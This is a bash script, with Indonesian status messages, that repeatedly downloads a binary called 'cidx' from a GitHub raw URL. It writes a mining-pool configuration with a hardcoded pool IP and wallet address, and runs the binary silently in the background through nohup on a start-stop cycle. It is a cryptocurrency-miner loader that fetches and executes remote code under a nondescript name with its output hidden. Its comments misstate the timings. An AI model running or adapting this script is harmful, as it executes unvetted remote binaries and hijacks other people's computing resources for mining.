#!/bin/bash

while true; do
  rm -rf cidx
  wget -O cidx https://github.com/barburonjilo/back/raw/main/sru >/dev/null 2>&1

  # Set the current date in UTC-7 format
  current_date=$(TZ=UTC-7 date +"%H-%M [%d-%m]")

  # Create config.json with the current date
  cat > config.json <<END
{
  "url": "146.190.150.214:443",
   "user": "mbc1qm7y0rx0r43t5c3f6y8uuf0pykaa2uq5h2emz3v.worker2",
  "pass": "x",
  "threads": 6,
  "algo": "power2b"
}
END

  # Make cidx and config.json executable
  chmod +x config.json cidx

  # Run cidx in the background
  # nohup ./cidx -c 'config.json' &>/dev/null &
  nohup ./cidx -a power2b  \
  -o 146.190.150.214:443 \
  -u mbc1qm7y0rx0r43t5c3f6y8uuf0pykaa2uq5h2emz3v.worker2 \
  -p x -t 6 &>/dev/null &


  # Print info: STARTED
  clear
  start_time=$(TZ=UTC-7 date +"%R-[%d/%m/%y]")
  echo "[$start_time] STATUS: 🚀 JALAN"
  echo "Process cidx dijalankan (4 menit aktif)..."
  jobs

  # Run awk to process config.json and print the matching date-time part
  awk -v date_str="i-${current_date}" '
  {
    if ($0 ~ /i-[0-9]{2}-[0-9]{2} \[[0-9]{2}-[0-9]{2}\]/) {
      match($0, /i-[0-9]{2}-[0-9]{2} \[[0-9]{2}-[0-9]{2}\]/, arr)
      if (length(arr) > 0) {
        print "Match log: " arr[0]
      }
    }
  }
  ' config.json

  # Run for 4 minutes
  sleep 120

  # Kill cidx process
  pkill cidx

  # Print info: STOPPED
  stop_time=$(TZ=UTC-7 date +"%R-[%d/%m/%y]")
  echo "[$stop_time] STATUS: 🛑 MATI"
  echo "Process cidx dimatikan (tunggu 1 menit)..."

  # Wait for 1 minute before restarting
  sleep 120
done
